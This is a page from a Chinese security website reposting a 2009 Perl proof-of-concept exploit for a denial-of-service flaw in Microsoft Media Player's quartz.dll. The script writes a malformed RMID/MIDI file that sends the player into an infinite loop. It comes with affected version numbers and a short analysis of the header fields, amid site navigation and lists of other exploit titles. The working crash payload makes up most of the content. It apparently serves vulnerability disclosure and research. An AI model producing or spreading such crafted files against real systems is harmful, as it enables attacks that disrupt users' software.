首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit
来源:http://www.vulnhunt.com/ 作者:vfocus 发布时间:2009-04-20  

#! /usr/bin/perl
# CAL_quartz_mid_poc.pl
#
# MircoSoft_Media_player_quartz.dll_mid_remote_Dos POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596

#other version should be affected

# CVE: please assign to this a CVE id
#
#ANALYSIS
#========
#  one vulnerability exists within the quartz.dll code processing RMID header
#the struct have following
#{
#  char riff_id[4]; //'RIFF'
#  DWORD rmid_size;
#  char rmid_id[4]; //'RMID'
#  char data_id[4]; //no eq data
#  DWORD midi_size;
#}
#if  data_id is not 'data' , and midi_size is 0xfffffff8.
#the code would fall into infinity loop.

#

open(Fin, ">poc.mid") || die "can't create crash sample.$!";
binmode(Fin);
$data = 
"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .
"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .
"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

print Fin $data;

close(Fin);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·The Miniweb webserver suffers
·Microsoft GDI Plugin .png Infi
·Apache Geronimo Application Se
·DNS Tools PHP Digger remote co
·MagicISO CCD/Cue Local Heap Ov
·XRDP <= 0.4.1 Remote Buffer Ov
·eLitius 1.0 (manage-admin.php)
·cTorrent/DTorrent (.Torrent Fi
·Oracle APEX 3.2 Unprivileged D
·ClanTiger <= 1.1.1 (slug) Blin
·webSPELL 4.2.0c Bypass BBCode
·Linux Kernel 2.6 UDEV Local Pr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved